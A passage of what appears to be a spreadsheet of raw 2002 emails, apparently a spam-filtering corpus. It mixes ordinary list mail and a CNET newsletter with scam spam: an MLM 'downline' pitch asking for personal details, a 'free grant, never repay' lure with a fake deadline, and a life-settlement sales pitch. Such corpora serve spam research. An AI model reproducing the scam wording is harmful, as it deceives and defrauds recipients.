 width=3D"180" height=3D"38"&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt; &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-99.gif" =
 width=3D"8" height=3D"8"&gt;&lt;br&gt;=20
             &lt;center&gt;
               &lt;b&gt;&lt;font size=3D"4"&gt;Multiple opportunities to earn =
 commissions&lt;br&gt;
               from one strategy!&lt;/font&gt;&lt;/b&gt;=20
             &lt;/center&gt;
             &lt;font size=3D"2"&gt;
             &lt;blockquote&gt; If any of your elderly client's health,=20
               personal, or financial needs or circumstances have changed =
 since=20
               the original life policy was issued you have the =
 opportunity to=20
               create an additional income stream with Life =
 Settlements:&lt;/blockquote&gt;
             &lt;b&gt;&lt;img src=3D"http://iiq.us/images/vbi/lsa/20020730-99.gif" =
 width=3D"30" height=3D"147" align=3D"left"&gt;
             &amp;#149; Earn a referral fee from a life settlement =
 transaction.&lt;br&gt;
             &amp;#149; Trailer commission on the policy for the agent of =
 record.&lt;br&gt;
             &amp;#149; Earn investment or annuity commissions from the =
 capital created by &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;the life settlement transaction.&lt;br&gt;
             &amp;#149; Earn a commission on new life insurance products that =
 better suit &lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;your client's current needs.&lt;br&gt;
             &amp;#149; Earn a commission on the conversion if the policy =
 being considered&lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;is a term product.&lt;br&gt;
             &amp;#149;Earn additional commissions for referring other agents =
 or agencies&lt;br&gt;
             &amp;nbsp;&amp;nbsp;&amp;nbsp;to The Life Settlement =
 Alliance.&lt;/b&gt;&lt;/font&gt;=20
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-99.gif" =
 width=3D"8" height=3D"8"&gt;&lt;br&gt;=20
             &lt;b&gt;&lt;font size=3D"2"&gt;Call today for more information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/Images/vbi/lsa/20020730-3.gif" =
 alt=3D"800-871-9440" width=3D"540" height=3D"64"&gt;=20
             &amp;#8212; or &amp;#8212; &lt;/font&gt;&lt;/b&gt;&lt;br&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#cccccc"&gt;
                       &lt;tr bgcolor=3D"#000066"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"contactname" size=3D"50"&gt;&lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"email" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;input type=3D"text" =
 name=3D"phone" size=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt; &lt;input type=3D"text" =
 name=3D"city" size=3D"20"&gt;&lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"20%"&gt; &lt;input type=3D"text" =
 name=3D"state" size=3D"2"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@vbimail.com"&gt;=20
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"VBI Ad Inquiry"&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;a =
 href=3D"http://www.lsalliance.com"&gt;&lt;img =
 src=3D"http://iiq.us/Images/vbi/lsa/20020730-4.gif" alt=3D"The Life =
 Settlement Alliance" width=3D"254" height=3D"119" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;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href=3D"http://www.Insuranceiq.com/optout/"&gt;=20
         http://www.Insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;&lt;a =
 href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal Notice&lt;/a&gt;&lt;/font&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;=20
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_C16F3_01C260C3.2978B160--
</t>
  </si>
  <si>
    <t xml:space="preserve">I have a similar one:
 Bubba calls up the DEA and tells em that JoeBob is growing pot and 
 hiding it in his back yard.  They go over, find nothing, and go ask Bubba 
 what he was talking about.  Bubba tells em it's in JoeBob's woodpile.  So 
 they go chop up all the wood and look through it and scatter it all over 
 the yard, but find nothing.  They ask Bubba again, and he tells them that 
 JoeBob must have already sold it, so they leave.  Bubba calls up JoeBob:
 Bubba: You get your wood chopped?'
 JoeBob: Yep, thanks, I'll give ya 15 bucks tomorrow.  (:
 sillyhead
 On 23 Jul 2002, Gary Lawrence Murphy wrote:
 &gt; 
 &gt; You're in luck because my mom sends these all the time and I never
 &gt; have anything else to do with them ...
 &gt; 
 &gt;  An old man lived alone in Minnesota. He wanted to spade his potato garden,
 &gt; but it was very hard work.
 &gt;  His only son, who would have helped him, was in Prison. The old man  wrote
 &gt; a  letter to his son and mentioned his predicament.
 &gt;  Shortly, he received this reply, "For heaven's sake Dad, don't dig up  that
 &gt; garden, that's where I buried the GUNS!"
 &gt;  At 4 A.M. the next morning, a dozen police showed up and dug up the old
 &gt; man's entire garden, without finding any guns.
 &gt;  Confused, the old man wrote another note to his son telling him what
 &gt; happened, and asking him what to do next.
 &gt;  His son's reply was: "Now plant your potatoes, Dad. It's the best
 &gt; I could  do  at this time."
 &gt; 
 &gt; but better than that, just settle into this, courtesy of daypop:
 &gt; http://xroads.virginia.edu/~UG02/yeung/actioncomics/cover.html
 &gt; 
 &gt; 
 -- 
 "My theology, briefly, is that the universe was dictated but not
           signed."  (Christopher Morley) 
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">[Skip Montanaro]
 &gt; Any thought to wrapping up your spam and ham test sets for
 &gt; inclusion w/ the spambayes project?
 I gave it all the thought it deserved &lt;wink&gt;.  It would be wonderful to get
 several people cranking on the same test data, and I'm all in favor of that.
 OTOH, my Data/ subtree currently has more than 35,000 files slobbering over
 134 million bytes -- even if I had a place to put that much stuff, I'm not
 sure my ISP would let me email it in one msg &lt;wink&gt;.
 Apart from that, there was a mistake very early on whose outcome was that
 this isn't the data I hoped I was using.  I *hoped* I was using a snapshot
 of only recent msgs (to match the snapshot this way of only spam from 2002),
 but turns out they actually go back to the last millennium.  Greg Ward is
 currently capturing a stream coming into python.org, and I hope we can get a
 more modern, and cleaner, test set out of that.  But if that stream contains
 any private email, it may not be ethically possible to make that available.
 Can you think of anyplace to get a large, shareable ham sample apart from a
 public mailing list?  Everyone's eager to share their spam, but spam is so
 much alike in so many ways that's the easy half of the data collection
 problem.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: I saw your email 7272Gtnz8-338r-13
</t>
  </si>
  <si>
    <t xml:space="preserve">I saw your email on a website I visited yesterday, and thought
 you might be interested in this. 
 A few months back I joined a program and then...promptly forgot
 about it. You may have done this yourself sometime...you intend
 to work the program but then get caught in your day-to-day
 activities and it's soon forgotten.
 The program was free to join so maybe I just didn't take it very
 seriously.
 Anyway, near the end of May I received a letter from my
 sponsor (Vic Patalano) informing me that I had more than 2000
 PAID members in my downline!
 As you can imagine, I was very skeptical. After all, how could I
 have more than 2000 paid members under me in a program that I had
 never promoted?
 I took the time to check out the site...then wrote to Vic asking
 for confirmation that these were paid members and not just free
 sign-ups...like me :)
 Well, it was true...I had 2365 paid members in my downline. This
 in a program that I had never worked!
 All I had to do was upgrade to a paid membership before the end
 of the month and I would have my position locked in and a
 downline of 2365 people.
 You can bet I wasted no time in getting my membership upgraded!
 I can tell you, if I had known what was happening with this
 program, I would have become an active paid member months ago!
 With this program, you will get a HUGE downline of PAID MEMBERS.
 My sponsor's check, which is a minimum of $5,000, arrives every
 month...on time.
 How would you like to lock your position in FREE while you check
 out this opportunity and watch your downline grow?
 To grab a FREE ID#, simply reply to:gitrman@excite.com
 and write this phrase:
 "Email me details about the club's business and consumer opportunities"
 Be sure to include your:
 1. First name
 2. Last name
 3. Email address (if different from above)
 We will confirm your position and send you a special report
 as soon as possible, and also Your Free Member Number.
 I'll get you entered and let you know how you can
 keep track of your growing downline.
 That's all there's to it.
 I'll then send you info, and you can make up your own mind.
 Warm regards,
 Bruce Stevens
 P.S. After having several negative experiences with network
 marketing companies I had pretty much given up on them.
 This company is different--it offers value, integrity, and a
 REAL opportunity to have your own home-based business...
 and finally make real money on the internet.
 Don't pass this up..you can sign up and test-drive the
 program for FREE. All you need to do is get your free
 membership.
 0754quAQ5-965nKuK1727EMl22
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your application is below. Expires July 27.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;HEAD&gt; 
 &lt;META charset=3DUTF-8&gt;&lt;/HEAD&gt;
 &lt;BODY background=3D""&gt;&lt;FONT color=3D#000000 face=3DArial&gt;
 &lt;TABLE border=3D1 borderColorDark=3D#e0e0e0 cellPadding=3D1 cellSpacing=3D=
 0 frame=3Dbox rules=3Dgroups 
 style=3D"BACKGROUND-COLOR:#e0e0e0; FONT-SIZE: x-small" width=3D"100%"&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#e0e0e0 color=3D"#000000"&gt;
 &lt;TR align=3Dleft bgColor=3D#e0e0e0 color=3D"#000000"&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;/STYLE&gt;
 &lt;META content=3D"MSHTML 5.50.4807.2300" name=3DGENERATOR&gt;
 &lt;DIV align=3Dcenter&gt;
 &lt;TABLE bgColor=3D#0033ff cellPadding=3D0 cellSpacing=3D3 width=3D652&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD&gt;
 &lt;TABLE bgColor=3D#71a5cc cellPadding=3D0 cellSpacing=3D0 width=3D646&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#71a5cc&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD align=3Dmiddle bgColor=3D#71a5cc&gt;&lt;FONT color=3Dwhite face=3Darial,helv=
 etica&gt;&lt;B&gt;
 &lt;font size=3D"5"&gt;
 &lt;BR&gt;Your application for the Grant is below. &lt;BR&gt; &lt;BR&gt;Remember, because of=
  the type of Grant this is,&lt;BR&gt; you will never need to repay!&lt;BR&gt;&lt;/B&gt;
 &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD bgColor=3D#71a5cc&gt;&lt;BR&gt;
 &lt;UL&gt;&lt;FONT color=3Dwhite face=3Darial,helvetica&gt;
 &lt;font size=3D"5"&gt;
 &lt;center&gt;&lt;font color=3D"red"&gt;&gt;&gt;
 &lt;font color=3D"yellow"&gt;
 Time is limited. &lt;font color=3D"red"&gt;&lt;&lt;&lt;br&gt; &lt;FONT color=3Dwhite face=3Dari=
 al,helvetica&gt;
 &lt;font size=3D"4"&gt;You must place your order by&lt;font size=3D"5"&gt;&lt;font color=3D=
 "yellow"&gt; Midnight, Saturday July 27, 2002&lt;font size=3D"4"&gt; &lt;br&gt;&lt;FONT colo=
 r=3Dwhite face=3Darial,helvetica&gt;
 in order to secure a place in these programs.&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;/center&gt;
  Too many people can qualify for this program, so by limiting the initial =
 applicants&lt;br&gt;
  to the most serious,  sincere and honest individuals. It will ensure that=
  the &lt;br&gt;
 program money is used for beneficial, constructive uses. &lt;br&gt;
  Remember there is &lt;b&gt;no risk&lt;/b&gt; on your part.&lt;br&gt;
 Also, each Grant is usually a &lt;b&gt;minimum of $10,000,&lt;/b&gt; so this is a grea=
 t opportunity!&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 &lt;center&gt;
 &lt;a href=3D"http://www.freehostchina.com/grant/web2pleasure/index.html"&gt;
 SEE IF YOU ARE ELIGIBLE FOR A LARGER GRANT!&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/center&gt;
 &lt;br&gt; If you do not qualify for the Free Grant Program, &lt;b&gt;you lose nothing=
 !&lt;/b&gt;&lt;br&gt;
 But if you don't even apply, you lose EVERYTHING! &lt;br&gt;Remember,
  not everyone gets this opportunity, &lt;br&gt;
 and you get to be one of the first people to apply! &lt;br&gt;
 So your chances are so much higher!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;FONT SIZE=3D"6"&gt;
 &lt;center&gt;
 &lt;a href=3D"http://www.freehostchina.com/grant/web2pleasure/index.html"&gt;
 APPLY NOW! &lt;FONT SIZE=3D"5"&gt;&lt;br&gt;
 Deadline is almost here!&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;/center&gt;
 &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt; 
 &lt;DIV align=3Dcenter&gt;&lt;/DIV&gt;&lt;/A&gt;&lt;/LI&gt;&lt;/UL&gt;
 &lt;DIV align=3Dcenter&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;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</si>
  <si>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Once upon a time, Daniel wrote :
 &gt;  &gt; And yes, I accept patches/comments/suggestions about all those spec
 &gt;  &gt; files!
 &gt; 
 &gt; Sure thing :)
 Cool :-)
 &gt; I've added to the spec some flags to remove OSS and ISA-PNP support at
 &gt; build time if one wishes to, so is's possible to do a
 &gt; 
 &gt; 	rpmbuild --recompile &lt;rpm&gt; --without oss --without isapnp
 OK, I'll add this.
 &gt; Also, having the kernel compiled by me, I have no kernel-source package
 &gt; installed.  I've added a flag "kernsrc", that also can be used
 &gt; --without, to remove the dependency for kernel-source at build time.  It
 &gt; would be nice to check the correct kernel include files actually exist
 &gt; (/lib/modules/`uname -r`/build/include/linux/*.h), though; however, I'm
 &gt; a beginner in RPM building -- is it possible to BuildRequire for a file
 &gt; not provided by a package at all?  I've googled a bit, and found no way
 &gt; to do that.
 Requiring a file that isn't part of an rpm is not possible, no, except
 maybe by stopping the build process if it isn't found... but that's errr...
 ugly!
 And I really think that for people who installed a kernel from sources, the
 easiest is to install the alsa kernel drivers from source too...
 &gt; I was also considering adding some sort of flag for the --with-cards
 &gt; option in alsa's ./configure, but don't know how to do that.  Only found
 &gt; out about --without from your first alsa-driver.spec, and existing RPM
 &gt; docs don't help much.
 This would be a tricky one since to use the "--with &lt;name&gt;" feature of
 rpmbuild, I think you'd need to add individual handling of each and every
 card :-/
 &gt; Oh, and one more thing :).  At first I've installed the first version of
 &gt; alsa-driver for 2.4.18-10, although I don't have that kernel, to supply
 &gt; the dependency for the rest of the alsa rpm's, and compiled the modules
 &gt; from source.  It created the /dev files and all.
 That's what the "alsa-driver" is there for, create all the base files
 excluding the kernel drivers. What I would suggest for dependency reasons
 it to install an "alsa-kernel" for the original kernel (you've kept it,
 right? ;-)) and install ALSA modules from source for custom kernels built
 from source.
 &gt; Then wanted to make my own rpm for 2.4.19, so now I'm trying to rpmbuild
 &gt; the alsa-kernel package.  Removed all alsa rpms, and tried my spec:
 &gt; 
 &gt; rpmbuild --ba alsa-driver.spec.mine --without oss --without isapnp
 &gt; --without kernsrc
 &gt; 
 &gt; But I get this:
 &gt; 
 &gt; ==[long successful compile snipped]=====================================
 &gt; RPM build errors:
 &gt;       File listed twice: /dev/adsp
 &gt;       File listed twice: /dev/amidi
 &gt;       Installed (but unpackaged) file(s) found:
 &gt;      /etc/makedev.d/00macros
 &gt;      /etc/rc.d/init.d/alsasound
 &gt; ========================================================================
 &gt; 
 &gt; Oh, and I think I've forgot to mention, I'm running beta-null :).
 Indeed : The rpm 4.1 snapshot in (null) has a few new features among which
 having the build fail when files are present in the build root but not
 listed in the %files section. I should remove them manually as part of the
 build process... or maybe the new "%exclude /path/to/file" in the %files
 section would do, but I don't know how older versions of rpm would handle
 it. On my (null) build system, I've simply set the variable :
 %_unpackaged_files_terminate_build 0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</si>
  <si>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Un
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/09/30.html#un
 Date: 2002-09-30T23:57:43-05:00
 _Paul Ford_: East River Unconsecration[1]. &amp;#8220;There are a lot of hearts 
 under the East River, and it took a long time for it to find mine.&amp;#8221;
 [1] http://ftrain.com/east_river_unconsecration.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Some Stupid Questions
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --lteA1dqeVaWQ9QQl
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Thu, Aug 22, 2002 at 01:01:44PM -0500, Ken Scott wrote:
 &gt; whitelist_from *@yahoogroups.com
 &gt;=20
 &gt; in his .spamassassin/user_prefs file, does that line not, in effect,
 &gt; tell the program to take no action at all against any mail coming in from
 &gt; yahoogroups.com, or is there still checking being done against it?  And if
 It still gets checked, but a negative score is added in.  And it doesn't
 mean "coming in from" it means "From: address is @yahoogroups.com".
 There's a Yahoo Groups compensation rule in 2.40 though. :)
 &gt; the latter, what does he need to place in user_prefs to cause such mail
 &gt; to be ignored?  I'm testing SA here with a few users who happen to be on
 ignored completely?  you can't do that, put in a procmail rule.
 &gt; yahoogroups lists, before deploying it system-wide, and although the above
 &gt; line has been added to their user_prefs files, much of their list mail is
 &gt; still going to the spam folder due to all the usual things you would
 &gt; expect to trigger SA.
 You'd want to either add your own compensation rule or up (negatively)
 the whitelist score.
 --=20
 Randomly Generated Tagline:
 There are perfectly good answers to those questions, but they'll have
  to wait for another night.
 =20
  		-- Homer Simpson
  		   Homers Barbershop Quartet
 --lteA1dqeVaWQ9QQl
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9ZSjDAuOQUeWAs2MRAk7zAKDCQJ8EQx5520TfLqgL+AogSqPOGwCg9fG4
 XMAdFMmo1slLu/d8Sqj44U0=
 =QHHd
 -----END PGP SIGNATURE-----
 --lteA1dqeVaWQ9QQl--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</si>
  <si>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&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Canning spam without eating up real mail&lt;/title&gt;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href="http://clickthru.online.com/Click?q=bd-c0nUQ7py5mj6JtNpAEVgnfqGsJPR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d2-THo_QULw1DvrAPV3Gl22vbAOyenR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e7-2y-GQmVXo3AKRDfVqS8CMB0qvseR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=fc-WpHmQVwFSu9paxna9-0t3VVat9yR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=11-l8riI2-4ELuxBxbX3VynhNBuCqlR"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12, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Canning spam without eating up real mail&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Tech companies chase homeland security&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Lukewarm response to Juniper moves&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 USA Today investigating hack attack&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Web services made easier?&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Wireless lands at European airports&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=26-KqPVIiMHolepwScBBBkqU8niQ74R" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Canning spam without eating up real mail&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Like a growing number of Web surfers, Audrie Krause faces a new uncertainty when she hits the send button on her e-mail these days: Will the message get through?
 As the head of a political action group, Krause uses members-only e-mail lists to help educate and organize fellow activists. So she was jarred recently when one message bounced back with a note accusing her of spreading unsolicited junk e-mail, or spam.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIs1GMBNEAY0VXXjhrHNHyR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Tech companies chase homeland security&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Software companies looking for greener pastures are turning to the red, white and blue.
 Whether out of heartfelt patriotism in the wake of Sept. 11 or the desire to tap into the nearly $38 billion budgeted for homeland security spending in 2003, many information technology companies that previously paid little attention to government contracts are now going to great lengths to attract government business.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:20 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPxgXlHD2Jlh9GpMUHM3FR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Lukewarm response to Juniper moves&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Juniper Networks continues to muddle through the telecom morass.
 Juniper beat estimates by earning less than $500,000, reported a 42 percent decline in year-over-year sales and offered little hope that it could grow its business when it reported 2002 second-quarter earnings on Thursday. Yet in some corners of the industry, Juniper's performance was viewed as mildly positive.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 12:00 PM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=66-kDH_IyWIARQeGIxsPj9y-DzbW-9R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;USA Today investigating hack attack&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 National newspaper USA Today said Friday that one or more online vandals had posted a fake front page and six phony news stories on its Web site.
 Network administrators have yet to determine how the vandals compromised the company's Web server Thursday night. The national newspaper has called in local law enforcement to help find out who defaced the site with fake stories.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:45 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=7b-prT_IBZIwRJDohkbDr4q1O7VpJcR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Web services made easier?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 The Web's leading standards group has updated its core draft specification for Web services.
 The World Wide Web Consortium (W3C) this week published Web Services Description Language (WSDL) 1.2, a language based on XML (Extensible Markup Language) that defines the protocol for interactive services on the Web, as well as their data and location.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:40 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=90-wHZMQ_Idqh3s6lgVb8HYULuonXiR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;Wireless lands at European airports&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Network giant Cisco Systems is installing Aironet wireless LANs into lounges at 19 airports across Europe, targeting business travelers with wireless cards in their laptops or personal digital assistants.
 The announcement includes various deals with different telecommunications companies and airports, made under the banner of Cisco Mobile Office, a campaign for wireless LANs (local area networks). The airport deals are at different stages, from a fully fledged paid-for service run by wireless provider Mobynet at Turkey's Ataturk Airport in Istanbul, where the wireless LAN was included when the airport was designed in 1999, to others that are still free trials.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 12, 2002, 11:15 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a5-DyaHQ7ZTa_wxQDgsIC1b2OB8OEPR"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&lt;b&gt;Too many rotten apples&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
